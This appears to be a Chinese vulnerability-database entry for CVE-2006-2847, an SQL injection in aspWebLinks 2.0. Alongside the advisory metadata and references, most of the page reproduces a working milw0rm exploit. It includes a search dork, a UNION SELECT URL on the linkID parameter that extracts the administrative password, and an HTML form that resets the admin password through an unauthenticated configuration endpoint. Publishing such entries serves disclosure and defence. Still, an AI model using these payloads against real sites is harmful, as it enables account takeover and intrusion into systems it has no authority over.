aspWebLinks Links.ASP SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110370 漏洞类型 SQL注入
发布时间 2006-06-01 更新时间 2006-11-03
CVE编号 CVE-2006-2847 CNNVD-ID CNNVD-200606-139
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1859
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-139
|漏洞详情
在aspWebLinks2.0中links.asp中存在SQL注入漏洞,远程攻击者可以通过linkID参数执行任意SQL命令。
|漏洞EXP
<!--
# Title  :   aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection
# Author :   ajann
# Dork   :   aspWebLinks 2.0

SQL INJECTION:
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config
-->


<title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title>
<form method='POST' action='links.asp?action=modifyconfigprocess'><input 
type='hidden' name='txtConfigID' value='1'><input type='hidden' 
name='txtSkinName' value='default'><table border='0' width='100%' 
cellspacing='0' cellpadding='3'><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative 
Password:</b></font></td><td width='70%'><input type='text' 
name='txtAdministrativePassword' size='43' 
value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days 
New:</b></font></td><td width='70%'><input type='text' 
name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input 
type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td 
width='30%' align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Links Per Page:</b></font></td><td width='70%'><input 
type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td 
width='30%' align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Category Header:</b></font></td><td width='70%'><input 
type='text' name='txtCategoryHeader' size='43' value='<b>Select A 
Category:</b>'></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Category 
Columns:</b></font></td><td width='70%'><input type='text' 
name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub 
Category Header:</b></font></td><td width='70%'><input type='text' 
name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick 
or ADD your link:'></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category 
Description:</b></font></td><td width='70%'><input type='radio' value='YES' 
name='txtShowCatDescription' checked >YES<input type='radio' value='NO' 
name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on 
home page:</b></font></td><td width='70%'><input type='radio' value='YES' 
name='txtShowWhatsNew' checked >YES<input type='radio' value='NO' 
name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New 
items on home page:</b></font></td><td width='70%'><input type='text' 
name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Show Whats Hot on home page:</b></font></td><td 
width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked 
 >YES<input type='radio' value='NO' name='txtShowWhatsHot' 
 >NO</td></tr><tr><td width='30%' align='right' valign='top'><font 
face="Tahoma" size="1" color="black"><b>Require approval for link and review 
additions:</b></font></td><td width='70%'><input type='radio' value='YES' 
name='txtNeedApproval' checked >YES<input type='radio' value='NO' 
name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot 
items on home page:</b></font></td><td width='70%'><input type='text' 
name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%' 
align='right' valign='top'><font face="Tahoma" size="1" 
color="black"><b>Whats New Header:</b></font></td><td width='70%'><input 
type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats 
New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font 
face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td 
width='70%'><input type='text' name='txtWhatsHotHeader' size='43' 
value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links 
By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option 
selected value='ALPHA'>Alphabetically</option><option  value='DATE'>Date 
Added</option><option  value='HITS'>Number of 
Visits</option></td></tr><tr><td width='30%' align='right' 
valign='top'><font face="Tahoma" size="1" 
color="black"><b></b></font></td><td width='70%'><input type='submit' 
value='Update Configuration' name='B1'></td></tr></table></form>

# milw0rm.com [2006-06-01]
|参考资料

来源:BID
名称:18235
链接:http://www.securityfocus.com/bid/18235
来源:BUGTRAQ
名称:20060602aspWebLinks2.0RemoteSQLInjection/AdminPassChangeExploit
链接:http://www.securityfocus.com/archive/1/archive/1/435735/100/0/threaded
来源:VUPEN
名称:ADV-2006-2114
链接:http://www.frsirt.com/english/advisories/2006/2114
来源:SECUNIA
名称:20419
链接:http://secunia.com/advisories/20419
来源:MILW0RM
名称:1859
链接:http://milw0rm.com/exploits/1859
来源:XF
名称:aspweblinks-links-sql-injection(26937)
链接:http://xforce.iss.net/xforce/xfdb/26937